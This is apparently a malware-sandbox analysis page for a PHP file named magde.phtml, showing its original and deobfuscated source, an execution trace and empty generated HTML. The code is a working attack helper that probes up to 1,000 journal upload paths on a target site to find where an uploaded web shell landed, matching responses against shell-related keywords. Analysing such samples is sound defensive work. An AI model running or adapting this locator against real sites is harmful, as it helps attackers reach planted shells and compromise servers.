magde.phtml

md5: 97d1faa56027b1b906f604d67afabe4c

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Environment
error_reporting (Deobfuscated, Original)
set_time_limit (Deobfuscated, Original, Traces)

Deobfuscated PHP code
<?php

set_time_limit(0);
//error_reporting(0);
function ngcurl($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    return curl_exec($ch);
}
function respon_code($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $res = curl_exec($ch);
    return curl_getinfo($ch, CURLINFO_HTTP_CODE);
}
$url = $argv[1];
$shell = $argv[2];
$pecah = explode("-", $shell);
$id = $pecah[0];
if (isset($url) and isset($shell)) {
    for ($x = 1; $x <= 1000; $x++) {
        $link = "{$url}/files/journals/{$x}/articles/{$id}/submission/original/{$shell}";
        $cek = ngcurl($link);
        if (preg_match("/shell|newfile|newfolder|pass|password|text|indoxploit|upload|eval|php|hacked|linux|windows|by|here/i", $cek) or respon_code($link) == "200") {
            echo "-> {$link}\n";
            break;
        }
    }
}
Execution traces
data/traces/97d1faa56027b1b906f604d67afabe4c_trace-1676248773.4452.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:39:59.343004]
1	0	1	0.000143	393528
1	3	0	0.000241	401248	{main}	1		/var/www/html/uploads/magde.phtml	0	0
2	4	0	0.000258	401248	set_time_limit	0		/var/www/html/uploads/magde.phtml	2	1	0
2	4	1	0.000276	401312
2	4	R			FALSE
1		A						/var/www/html/uploads/magde.phtml	18	$url = NULL
1		A						/var/www/html/uploads/magde.phtml	19	$shell = NULL
2	5	0	0.000334	401280	explode	0		/var/www/html/uploads/magde.phtml	20	2	'-'	NULL
2	5	1	0.000348	401728
2	5	R			[0 => '']
1		A						/var/www/html/uploads/magde.phtml	20	$pecah = [0 => '']
1		A						/var/www/html/uploads/magde.phtml	21	$id = ''
1	3	1	0.000385	401656
			0.000409	318016
TRACE END   [2023-02-12 22:39:59.343298]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php
set_time_limit(0);
//error_reporting(0);
function ngcurl($url) {
	$ch = curl_init($url);
	  	  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	return curl_exec($ch);
	  	  curl_close($ch);
}
function respon_code($url) {
	$ch = curl_init($url);
	  	  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$res = curl_exec($ch);
	return curl_getinfo($ch, CURLINFO_HTTP_CODE);
	  	  curl_close($ch);
}

$url = $argv[1];
$shell = $argv[2];
$pecah = explode("-", $shell);
$id = $pecah[0];
if(isset($url) AND isset($shell)) {
	for($x = 1; $x <= 1000; $x++) {
		$link = "$url/files/journals/$x/articles/$id/submission/original/$shell";
		$cek = ngcurl($link);
		if(preg_match("/shell|newfile|newfolder|pass|password|text|indoxploit|upload|eval|php|hacked|linux|windows|by|here/i", $cek) OR respon_code($link) == "200") {
			echo "-> $link\n";
			break;
		}
	}
}
?>

PHP Malware Analysis

magde.phtml

md5: 97d1faa56027b1b906f604d67afabe4c

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code